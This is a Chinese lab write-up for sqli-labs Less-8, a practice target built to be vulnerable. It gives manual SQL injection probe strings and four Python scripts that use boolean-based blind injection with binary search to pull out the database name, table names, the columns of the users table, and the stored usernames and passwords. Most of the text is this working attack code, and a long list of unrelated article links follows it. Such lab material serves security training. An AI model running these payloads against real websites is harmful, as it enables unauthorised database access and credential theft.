SQL注入实例（sqli-labs/less-8）

?id=1 and 1=1 
?id=1 and 1=2
?id=1'
?id=1' and 1=1 --+
?id=1' and 1=2 --+

def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

def inject_database1(url):name = ''for i in range(1, 40):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

def inject_database1(url):name = ''for i in range(1, 150):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

def inject_database1(url):name = ''for i in range(1, 150):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d -- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

相关文章：

北京网站建设多少钱？

辽宁网页制作哪家好_网站建设

高端品牌网站建设_汉中网站制作

freeRTOS入门学习-基于STM32F103C8T6最小系统板-使用cubeMX创建一个新的工程

SpringBoot 框架学习笔记（七）：Thymeleaf、拦截器 和 文件上传实现（解决了文件重名 和 按日期分目录存放问题）

Qt/C++最新地图组件发布/历时半年重构/同时支持各种地图内核/包括百度高德腾讯天地图

大数据项目——广告数仓之HTTP概述

centos开启samba服务

flutter路由配置

使用Python实现深度学习模型：智能垃圾分类与环境保护

Navicat—如何查看历史日志

默认序列化会报警告Hessian/Burlap: calss is an unknown class in WebappClassLoader

[MRCTF2020]Ezpop

Linux驱动开发—设备树描述引脚复用 Pinmux 与Pinctrl

（24）(24.1) FPV和仿真的机载OSD（三）

【图书推荐】《数据资产管理核心技术与应用》

JAVA中的Wrapper类

认识消息队列：Spring Boot 实现 MQ 消息队列，解锁异步、削峰、广播等高级功能！

【每日笔记】【Go学习笔记】2019-01-10 codis proxy处理流程

【知识碎片】第三方登录弹窗效果

Android 初级面试者拾遗（前台界面篇）之 Activity 和 Fragment

Angular 响应式表单 基础例子

C++类的相互关联

IIS 10 PHP CGI 设置 PHP_INI_SCAN_DIR

java取消线程实例

JSONP原理

mockjs让前端开发独立于后端

Netty 4.1 源代码学习：线程模型

PHP 的 SAPI 是个什么东西

Python学习笔记 字符串拼接

每天10道Java面试题，跟我走，offer有！

那些年我们用过的显示性能指标

使用Maven插件构建SpringBoot项目,生成Docker镜像push到DockerHub上

如何通过报表单元格右键控制报表跳转到不同链接地址 ...

# Kafka_深入探秘者（2）：kafka 生产者

# Spring Cloud Alibaba Nacos_配置中心与服务发现（四）

#{} 和 ${}区别

#NOIP 2014# day.1 T3 飞扬的小鸟 bird

$.ajax()方法详解

（k8s中）docker netty OOM问题记录

（动态规划）5. 最长回文子串 java解决

（二）hibernate配置管理

（二）什么是Vite——Vite 和 Webpack 区别（冷启动）

（二十九）STL map容器（映射）与STL pair容器（值对）

(附源码)计算机毕业设计ssm高校《大学语文》课程作业在线管理系统

（黑马点评）二、短信登录功能实现

(简单) HDU 2612 Find a way，BFS。

（力扣）1314.矩阵区域和

（六）c52学习之旅-独立按键

(免费领源码）Python#MySQL图书馆管理系统071718-计算机毕业设计项目选题推荐

（亲测）设​置​m​y​e​c​l​i​p​s​e​打​开​默​认​工​作​空​间...

(转)创业的注意事项

(转)关于pipe()的详细解析

.【机器学习】隐马尔可夫模型（Hidden Markov Model，HMM）

.java 指数平滑_转载：二次指数平滑法求预测值的Java代码

.net framework4与其client profile版本的区别

.NET编程——利用C#调用海康机器人工业相机SDK实现回调取图与软触发取图【含免费源码】

.Net的DataSet直接与SQL2005交互